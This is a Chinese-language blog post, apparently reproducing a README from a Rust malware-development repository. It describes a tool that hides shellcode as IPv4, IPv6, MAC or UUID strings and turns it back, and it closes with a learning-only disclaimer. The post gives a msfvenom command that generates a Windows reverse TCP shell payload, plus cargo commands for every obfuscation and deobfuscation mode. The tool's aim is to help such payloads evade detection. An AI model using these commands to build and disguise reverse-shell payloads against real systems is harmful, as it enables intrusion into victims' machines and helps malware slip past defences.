Shellcode 混淆和反混淆技术
使用此代码,您可以使用 Ipv4、Ipv6、MAC、UUiD 格式对 shellcode 进行混淆和反混淆。
用途
出于安全原因。我正在删除 payload.bin。你自己生成 .bin...!
例子:
msfvenom -p windows/shell/reverse_tcp lhost=eth0 lport=4444 -f raw -o payload.bin
命令格式
cargo run -- -f <file> -t <technique> -o <operation>
只需运行该程序即可查看用法
cargo run
混淆有效载荷。
cargo run -- -f .\payload.bin -t ipv4 -o obfuscate
对payload进行反混淆
cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate
所有用途
混淆命令
使用 IPv4 进行混淆
cargo run -- -f .\payload.bin -t ipv4 -o obfuscate
使用 IPv6 进行混淆
cargo run -- -f .\payload.bin -t ipv6 -o obfuscate
使用 MAC 进行混淆
cargo run -- -f .\payload.bin -t mac -o obfuscate
使用 UUID 进行混淆
cargo run -- -f .\payload.bin -t uuid -o obfuscate
反混淆命令
使用 IPv4 进行反混淆
cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate
使用 IPv6 进行反混淆
cargo run -- -f .\obfuscated_ipv6.txt -t ipv6 -o deobfuscate
使用 MAC 进行反混淆
cargo run -- -f .\obfuscated_mac.txt -t mac -o deobfuscate
使用 UUID 进行反混淆
cargo run -- -f .\obfuscated_uuid.txt -t uuid -o deobfuscate
Shellcode Obfuscation and Deobfuscation Technique
https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/obfuscation
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果